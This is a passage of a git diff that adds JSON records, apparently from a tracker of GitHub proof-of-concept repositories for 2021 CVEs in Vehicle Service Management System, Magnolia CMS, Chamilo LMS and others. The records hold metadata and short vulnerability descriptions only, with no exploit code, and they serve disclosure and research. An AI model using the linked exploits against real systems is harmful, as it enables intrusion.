+ },
+ {
+ "id": 448089503,
+ "name": "CVE-2021-46073",
+ "full_name": "plsanu\/CVE-2021-46073",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46073",
+ "description": "CVE-2021-46073 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.",
+ "fork": false,
+ "created_at": "2022-01-14T19:49:07Z",
+ "updated_at": "2023-12-30T08:24:07Z",
+ "pushed_at": "2022-01-14T19:49:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46074.json b/2021/CVE-2021-46074.json
new file mode 100644
index 0000000000..7d961833f3
--- /dev/null
+++ b/2021/CVE-2021-46074.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442490679,
+ "name": "Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS",
+ "description": "CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.",
+ "fork": false,
+ "created_at": "2021-12-28T14:37:00Z",
+ "updated_at": "2022-01-14T19:58:38Z",
+ "pushed_at": "2022-01-14T20:01:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448092556,
+ "name": "CVE-2021-46074",
+ "full_name": "plsanu\/CVE-2021-46074",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46074",
+ "description": "CVE-2021-46074 - A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.",
+ "fork": false,
+ "created_at": "2022-01-14T20:01:50Z",
+ "updated_at": "2023-12-30T08:24:03Z",
+ "pushed_at": "2022-01-14T20:02:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46075.json b/2021/CVE-2021-46075.json
new file mode 100644
index 0000000000..5c105d7624
--- /dev/null
+++ b/2021/CVE-2021-46075.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442493273,
+ "name": "Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations",
+ "description": "CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.",
+ "fork": false,
+ "created_at": "2021-12-28T14:46:13Z",
+ "updated_at": "2022-01-14T20:10:51Z",
+ "pushed_at": "2022-01-14T20:14:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448095827,
+ "name": "CVE-2021-46075",
+ "full_name": "plsanu\/CVE-2021-46075",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46075",
+ "description": "CVE-2021-46075 - A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.",
+ "fork": false,
+ "created_at": "2022-01-14T20:15:28Z",
+ "updated_at": "2023-12-30T08:24:01Z",
+ "pushed_at": "2022-01-14T20:16:06Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46076.json b/2021/CVE-2021-46076.json
new file mode 100644
index 0000000000..e0d76a4dfc
--- /dev/null
+++ b/2021/CVE-2021-46076.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442497045,
+ "name": "Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution",
+ "description": "CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.",
+ "fork": false,
+ "created_at": "2021-12-28T15:00:17Z",
+ "updated_at": "2022-01-14T20:22:51Z",
+ "pushed_at": "2022-01-14T20:27:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448098738,
+ "name": "CVE-2021-46076",
+ "full_name": "plsanu\/CVE-2021-46076",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46076",
+ "description": "CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.",
+ "fork": false,
+ "created_at": "2022-01-14T20:28:01Z",
+ "updated_at": "2023-12-30T08:23:57Z",
+ "pushed_at": "2022-01-14T20:28:53Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46078.json b/2021/CVE-2021-46078.json
new file mode 100644
index 0000000000..0dc8d8d72a
--- /dev/null
+++ b/2021/CVE-2021-46078.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442506922,
+ "name": "Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting",
+ "description": "CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-28T15:35:20Z",
+ "updated_at": "2022-01-14T20:45:28Z",
+ "pushed_at": "2022-01-14T20:48:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448103762,
+ "name": "CVE-2021-46078",
+ "full_name": "plsanu\/CVE-2021-46078",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46078",
+ "description": "CVE-2021-46078 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.",
+ "fork": false,
+ "created_at": "2022-01-14T20:49:42Z",
+ "updated_at": "2023-12-30T08:23:53Z",
+ "pushed_at": "2022-01-14T20:50:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46079.json b/2021/CVE-2021-46079.json
new file mode 100644
index 0000000000..3fd0743ca2
--- /dev/null
+++ b/2021/CVE-2021-46079.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442547992,
+ "name": "Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection",
+ "description": "CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.",
+ "fork": false,
+ "created_at": "2021-12-28T18:17:36Z",
+ "updated_at": "2022-01-14T21:15:54Z",
+ "pushed_at": "2022-01-14T21:19:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448111645,
+ "name": "CVE-2021-46079",
+ "full_name": "plsanu\/CVE-2021-46079",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46079",
+ "description": "CVE-2021-46079 - An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.",
+ "fork": false,
+ "created_at": "2022-01-14T21:26:02Z",
+ "updated_at": "2023-12-30T08:23:50Z",
+ "pushed_at": "2022-01-14T21:27:13Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46080.json b/2021/CVE-2021-46080.json
new file mode 100644
index 0000000000..962d11ad7e
--- /dev/null
+++ b/2021/CVE-2021-46080.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 442549429,
+ "name": "Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS",
+ "full_name": "plsanu\/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS",
+ "description": "CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-28T18:23:42Z",
+ "updated_at": "2022-01-30T06:08:01Z",
+ "pushed_at": "2022-01-14T21:59:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 448115642,
+ "name": "CVE-2021-46080",
+ "full_name": "plsanu\/CVE-2021-46080",
+ "owner": {
+ "login": "plsanu",
+ "id": 61007700,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61007700?v=4",
+ "html_url": "https:\/\/github.com\/plsanu"
+ },
+ "html_url": "https:\/\/github.com\/plsanu\/CVE-2021-46080",
+ "description": "CVE-2021-46080 - A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.",
+ "fork": false,
+ "created_at": "2022-01-14T21:45:58Z",
+ "updated_at": "2023-12-30T08:23:46Z",
+ "pushed_at": "2022-01-14T21:58:46Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46108.json b/2021/CVE-2021-46108.json
new file mode 100644
index 0000000000..b160461bb7
--- /dev/null
+++ b/2021/CVE-2021-46108.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 454438577,
+ "name": "CVE-2021-46108",
+ "full_name": "g-rubert\/CVE-2021-46108",
+ "owner": {
+ "login": "g-rubert",
+ "id": 40837605,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40837605?v=4",
+ "html_url": "https:\/\/github.com\/g-rubert"
+ },
+ "html_url": "https:\/\/github.com\/g-rubert\/CVE-2021-46108",
+ "description": " Stored Cross-Site Scripting - D-Link",
+ "fork": false,
+ "created_at": "2022-02-01T15:21:15Z",
+ "updated_at": "2022-02-01T15:37:47Z",
+ "pushed_at": "2022-05-05T14:58:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46143.json b/2021/CVE-2021-46143.json
new file mode 100644
index 0000000000..f3c343baf7
--- /dev/null
+++ b/2021/CVE-2021-46143.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 480370483,
+ "name": "external_expat_AOSP10_r33_CVE-2021-46143",
+ "full_name": "nanopathi\/external_expat_AOSP10_r33_CVE-2021-46143",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/external_expat_AOSP10_r33_CVE-2021-46143",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-11T12:29:22Z",
+ "updated_at": "2022-04-11T12:57:15Z",
+ "pushed_at": "2022-04-11T12:58:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46361.json b/2021/CVE-2021-46361.json
new file mode 100644
index 0000000000..d699227ca8
--- /dev/null
+++ b/2021/CVE-2021-46361.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 758677884,
+ "name": "CVE-2021-46361",
+ "full_name": "mbadanoiu\/CVE-2021-46361",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46361",
+ "description": "CVE-2021-46361: FreeMarker Restriction Bypass in Magnolia CMS",
+ "fork": false,
+ "created_at": "2024-02-16T20:36:32Z",
+ "updated_at": "2024-03-25T07:57:35Z",
+ "pushed_at": "2024-02-16T20:50:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "bypass",
+ "cve",
+ "cve-2021-46361",
+ "cves",
+ "remote-code-execution",
+ "server-side-template-injection"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46362.json b/2021/CVE-2021-46362.json
new file mode 100644
index 0000000000..a0a413d9b8
--- /dev/null
+++ b/2021/CVE-2021-46362.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 757003959,
+ "name": "CVE-2021-46362",
+ "full_name": "mbadanoiu\/CVE-2021-46362",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46362",
+ "description": "CVE-2021-46362: FreeMarker Server-Side Template Injection in Magnolia CMS",
+ "fork": false,
+ "created_at": "2024-02-13T18:08:02Z",
+ "updated_at": "2024-02-14T09:51:22Z",
+ "pushed_at": "2024-02-14T08:37:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "cve",
+ "cve-2021-46362",
+ "cves",
+ "server-side-template-injection",
+ "unauthenticated"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46363.json b/2021/CVE-2021-46363.json
new file mode 100644
index 0000000000..7ddf70744b
--- /dev/null
+++ b/2021/CVE-2021-46363.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 757111019,
+ "name": "CVE-2021-46363",
+ "full_name": "mbadanoiu\/CVE-2021-46363",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46363",
+ "description": "CVE-2021-46363: Formula Injection in Magnolia CMS",
+ "fork": false,
+ "created_at": "2024-02-13T20:36:24Z",
+ "updated_at": "2024-02-13T20:50:51Z",
+ "pushed_at": "2024-02-13T20:47:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "csv-injection",
+ "cve",
+ "cve-2021-46363",
+ "cves"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46364.json b/2021/CVE-2021-46364.json
new file mode 100644
index 0000000000..7845767744
--- /dev/null
+++ b/2021/CVE-2021-46364.json
@@ -0,0 +1,40 @@
+[
+ {
+ "id": 722765060,
+ "name": "CVE-2021-46364",
+ "full_name": "mbadanoiu\/CVE-2021-46364",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46364",
+ "description": "CVE-2021-46364: YAML Deserialization in Magnolia CMS",
+ "fork": false,
+ "created_at": "2023-11-23T22:37:01Z",
+ "updated_at": "2024-06-17T13:06:03Z",
+ "pushed_at": "2023-11-23T22:42:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "cve",
+ "cve-2021-46364",
+ "cves",
+ "deserialization",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46365.json b/2021/CVE-2021-46365.json
new file mode 100644
index 0000000000..2588ecde06
--- /dev/null
+++ b/2021/CVE-2021-46365.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 757116903,
+ "name": "CVE-2021-46365",
+ "full_name": "mbadanoiu\/CVE-2021-46365",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46365",
+ "description": "CVE-2021-46365: Unsafe XML Parsing in Magnolia CMS",
+ "fork": false,
+ "created_at": "2024-02-13T20:52:49Z",
+ "updated_at": "2024-02-13T21:05:16Z",
+ "pushed_at": "2024-02-13T21:00:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "authenticated",
+ "cve",
+ "cve-2021-46365",
+ "cves",
+ "xxe"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46366.json b/2021/CVE-2021-46366.json
new file mode 100644
index 0000000000..3a99f71da6
--- /dev/null
+++ b/2021/CVE-2021-46366.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 757122830,
+ "name": "CVE-2021-46366",
+ "full_name": "mbadanoiu\/CVE-2021-46366",
+ "owner": {
+ "login": "mbadanoiu",
+ "id": 18383407,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4",
+ "html_url": "https:\/\/github.com\/mbadanoiu"
+ },
+ "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2021-46366",
+ "description": "CVE-2021-46366: Credential Bruteforce Attack via CSRF + Open Redirect in Magnolia CMS",
+ "fork": false,
+ "created_at": "2024-02-13T21:09:53Z",
+ "updated_at": "2024-02-13T21:25:46Z",
+ "pushed_at": "2024-02-13T21:20:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0-day",
+ "csrf",
+ "cve",
+ "cve-2021-46366",
+ "cves",
+ "open-redirect"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46381.json b/2021/CVE-2021-46381.json
new file mode 100644
index 0000000000..3f371d0d43
--- /dev/null
+++ b/2021/CVE-2021-46381.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 498296485,
+ "name": "-cve-2021-46381",
+ "full_name": "JCPpeiqi\/-cve-2021-46381",
+ "owner": {
+ "login": "JCPpeiqi",
+ "id": 106591002,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106591002?v=4",
+ "html_url": "https:\/\/github.com\/JCPpeiqi"
+ },
+ "html_url": "https:\/\/github.com\/JCPpeiqi\/-cve-2021-46381",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-31T10:54:40Z",
+ "updated_at": "2022-05-31T11:01:14Z",
+ "pushed_at": "2022-05-31T11:01:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-46398.json b/2021/CVE-2021-46398.json
new file mode 100644
index 0000000000..03dd5744b9
--- /dev/null
+++ b/2021/CVE-2021-46398.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 472870293,
+ "name": "CVE-2021-46398_Chamilo-LMS-RCE",
+ "full_name": "febinrev\/CVE-2021-46398_Chamilo-LMS-RCE",
+ "owner": {
+ "login": "febinrev",
+ "id": 52229330,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4",
+ "html_url": "https:\/\/github.com\/febinrev"
+ },
+ "html_url": "https:\/\/github.com\/febinrev\/CVE-2021-46398_Chamilo-LMS-RCE",
+ "description": "Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page.",
+ "fork": false,
+ "created_at": "2022-03-22T17:35:38Z",
+ "updated_at": "2024-05-31T16:35:32Z",
+ "pushed_at": "2022-03-22T17:47:05Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 584703298,
+ "name": "CVE-2021-46398",
+ "full_name": "LalieA\/CVE-2021-46398",
+ "owner": {
+ "login": "LalieA",
+ "id": 83229713,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83229713?v=4",
+ "html_url": "https:\/\/github.com\/LalieA"
+ },
+ "html_url": "https:\/\/github.com\/LalieA\/CVE-2021-46398",
+ "description": "A Proof of Concept for the CVE-2021-46398 flaw exploitation ",
+ "fork": false,
+ "created_at": "2023-01-03T09:49:22Z",
+ "updated_at": "2023-09-10T23:05:12Z",
+ "pushed_at": "2023-09-10T23:04:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
